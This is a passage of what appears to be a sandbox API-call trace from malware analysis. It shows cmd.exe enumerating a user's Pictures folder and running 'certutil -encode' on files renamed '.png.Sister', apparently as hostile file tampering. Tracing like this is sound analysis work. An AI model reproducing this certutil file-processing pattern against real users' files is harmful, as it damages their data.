cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"lrXVOGLmm_sYY.png.Sister\" \"lrXVOGLmm_sYY.png.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1290, dwThreadId=0x11f4)) returned 1 [0299.855] CloseHandle (hObject=0xa4) returned 1 [0299.855] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0299.855] GetProcessHeap () returned 0x21ed8c70000 [0299.855] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0299.855] GetEnvironmentStringsW () returned 0x21ed937e320* [0299.855] GetProcessHeap () returned 0x21ed8c70000 [0299.855] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0299.856] FreeEnvironmentStringsA (penv="=") returned 1 [0299.870] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0300.840] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0300.840] CloseHandle (hObject=0xa8) returned 1 [0300.840] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0300.840] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0300.840] GetProcessHeap () returned 0x21ed8c70000 [0300.841] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0300.841] GetEnvironmentStringsW () returned 0x21ed937e320* [0300.841] GetProcessHeap () returned 0x21ed8c70000 [0300.841] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0300.841] FreeEnvironmentStringsA (penv="=") returned 1 [0300.841] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0300.841] GetProcessHeap () returned 0x21ed8c70000 [0300.841] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0300.841] GetEnvironmentStringsW () returned 0x21ed937e320* [0300.841] GetProcessHeap () returned 0x21ed8c70000 [0300.841] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0300.842] FreeEnvironmentStringsA (penv="=") returned 1 [0300.842] GetProcessHeap () returned 0x21ed8c70000 [0300.842] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95560) returned 1 [0300.842] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0300.842] ??_V@YAXPEAX@Z () returned 0x1 [0300.842] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21af0bf0, ftCreationTime.dwHighDateTime=0x1d5e34b, ftLastAccessTime.dwLowDateTime=0x588a79a0, ftLastAccessTime.dwHighDateTime=0x1d5e6ef, ftLastWriteTime.dwLowDateTime=0x588a79a0, ftLastWriteTime.dwHighDateTime=0x1d5e6ef, nFileSizeHigh=0x0, nFileSizeLow=0xb2c0, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="qH5GV-YJCqquRIYDQ_S.png.Sister", cAlternateFileName="")) returned 1 [0300.842] GetProcessHeap () returned 0x21ed8c70000 [0300.842] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45640, Size=0x232) returned 0x21ed8d45640 [0300.842] GetProcessHeap () returned 0x21ed8c70000 [0300.842] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45640) returned 0x232 [0300.842] GetProcessHeap () returned 0x21ed8c70000 [0300.842] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0ae0 [0300.842] GetProcessHeap () returned 0x21ed8c70000 [0300.842] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0ae0, Size=0x58) returned 0x21ed93b0ae0 [0300.842] GetProcessHeap () returned 0x21ed8c70000 [0300.842] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0ae0) returned 0x58 [0300.842] GetProcessHeap () returned 0x21ed8c70000 [0300.842] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0b50 [0300.842] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0300.843] GetProcessHeap () returned 0x21ed8c70000 [0300.843] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4e) returned 0x21ed8c7ce80 [0300.843] ??_V@YAXPEAX@Z () returned 0x1 [0300.843] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0300.843] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cca0 [0300.843] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0300.843] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0300.844] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0300.844] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdd88511a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdd88511a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cd00 [0300.844] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0300.844] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\qH5GV-YJCqquRIYDQ_S.png.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21af0bf0, ftCreationTime.dwHighDateTime=0x1d5e34b, ftLastAccessTime.dwLowDateTime=0x588a79a0, ftLastAccessTime.dwHighDateTime=0x1d5e6ef, ftLastWriteTime.dwLowDateTime=0x588a79a0, ftLastWriteTime.dwHighDateTime=0x1d5e6ef, nFileSizeHigh=0x0, nFileSizeLow=0xb2c0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="qH5GV-YJCqquRIYDQ_S.png.Sister", cAlternateFileName="QH5GV-~1.SIS")) returned 0x21ed8c7d060 [0300.844] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0300.845] _wcsnicmp (_String1="QH5GV-~1.SIS", _String2="qH5GV-YJCqquRIYDQ_S.png.Sister", _MaxCount=0x1e) returned 5 [0300.845] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0300.845] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0300.845] GetProcessHeap () returned 0x21ed8c70000 [0300.845] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7bad0 [0300.845] ??_V@YAXPEAX@Z () returned 0x1 [0300.845] ??_V@YAXPEAX@Z () returned 0x1 [0300.845] GetProcessHeap () returned 0x21ed8c70000 [0300.845] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0b50, Size=0x260) returned 0x21ed93b0b50 [0300.845] GetProcessHeap () returned 0x21ed8c70000 [0300.845] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0b50) returned 0x260 [0300.845] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0300.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.845] GetFileType (hFile=0x50) returned 0x2 [0300.845] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.845] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0300.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.846] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0300.852] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0300.852] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0300.852] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0300.852] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0300.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.852] GetFileType (hFile=0x50) returned 0x2 [0300.852] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.852] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0300.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.853] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0300.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.854] GetFileType (hFile=0x50) returned 0x2 [0300.854] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.854] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0300.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.854] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b0af0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed93b0af0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0300.876] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"qH5GV-YJCqquRIYDQ_S.png.Sister\" \"qH5GV-YJCqquRIYDQ_S.png.Cruel\" ") returned 74 [0300.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.876] GetFileType (hFile=0x50) returned 0x2 [0300.876] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.876] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0300.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.878] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x4a, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x4a) returned 1 [0300.878] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0300.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.878] GetFileType (hFile=0x50) returned 0x2 [0300.878] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.878] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0300.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.879] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0300.883] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0300.884] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0300.884] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0300.884] malloc (_Size=0xffce) returned 0x21eda100000 [0300.884] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0300.884] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0300.884] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0300.884] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0300.884] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0300.884] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0300.884] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0300.884] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0300.884] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0300.884] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0300.884] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0300.884] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0300.884] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0300.884] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0300.884] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0300.885] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0300.885] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0300.885] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0300.885] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0300.885] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0300.885] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0300.885] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0300.885] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0300.885] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0300.885] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0300.885] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0300.885] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0300.885] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0300.885] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0300.885] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0300.885] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0300.885] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0300.885] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0300.885] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0300.885] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0300.885] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0300.885] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0300.885] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0300.885] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0300.885] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0300.885] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0300.885] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0300.885] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0300.886] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0300.886] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0300.886] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0300.886] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0300.886] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0300.886] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0300.886] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0300.886] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0300.886] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0300.886] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0300.886] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0300.886] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0300.886] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0300.886] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0300.886] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0300.886] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0300.886] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0300.886] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0300.886] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0300.886] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0300.886] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0300.886] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0300.886] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0300.886] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0300.886] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0300.886] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0300.886] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0300.887] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0300.887] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0300.887] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0300.887] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0300.887] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0300.887] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0300.887] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0300.887] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0300.887] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0300.887] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0300.887] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0300.887] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0300.887] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0300.887] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0300.887] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0300.887] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0300.887] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0300.887] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0300.887] ??_V@YAXPEAX@Z () returned 0x1 [0300.887] GetProcessHeap () returned 0x21ed8c70000 [0300.887] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d09940 [0300.887] GetProcessHeap () returned 0x21ed8c70000 [0300.887] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb6) returned 0x21ed8c96880 [0300.888] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0300.888] malloc (_Size=0xffce) returned 0x21eda100000 [0300.888] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0300.888] GetProcessHeap () returned 0x21ed8c70000 [0300.888] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9280080 [0300.893] SetErrorMode (uMode=0x0) returned 0x0 [0300.893] SetErrorMode (uMode=0x1) returned 0x0 [0300.893] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9280090, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0300.893] SetErrorMode (uMode=0x0) returned 0x1 [0300.894] GetProcessHeap () returned 0x21ed8c70000 [0300.894] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9280080, Size=0x54) returned 0x21ed9280080 [0300.894] GetProcessHeap () returned 0x21ed8c70000 [0300.894] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9280080) returned 0x54 [0300.894] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0300.894] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0300.894] GetProcessHeap () returned 0x21ed8c70000 [0300.894] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed937daf0 [0300.894] GetProcessHeap () returned 0x21ed8c70000 [0300.894] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d44270 [0300.894] GetProcessHeap () returned 0x21ed8c70000 [0300.894] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44270, Size=0x1c0) returned 0x21ed937c360 [0300.894] GetProcessHeap () returned 0x21ed8c70000 [0300.894] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937c360) returned 0x1c0 [0300.894] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0300.894] GetProcessHeap () returned 0x21ed8c70000 [0300.894] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c95c40 [0300.894] GetProcessHeap () returned 0x21ed8c70000 [0300.894] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95c40, Size=0x7e) returned 0x21ed8c95c40 [0300.894] GetProcessHeap () returned 0x21ed8c70000 [0300.894] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95c40) returned 0x7e [0300.895] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.895] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0300.895] GetLastError () returned 0x2 [0300.895] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.895] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0300.896] GetLastError () returned 0x2 [0300.896] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.896] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0300.896] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0300.896] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0300.896] GetLastError () returned 0x2 [0300.896] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0300.896] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0300.896] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0300.896] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0300.897] ??_V@YAXPEAX@Z () returned 0x1 [0300.897] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0300.899] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0300.899] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0300.899] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0300.900] GetProcessHeap () returned 0x21ed8c70000 [0300.900] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45c80 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0300.900] _wcsnicmp (_String1="COPYCMD", 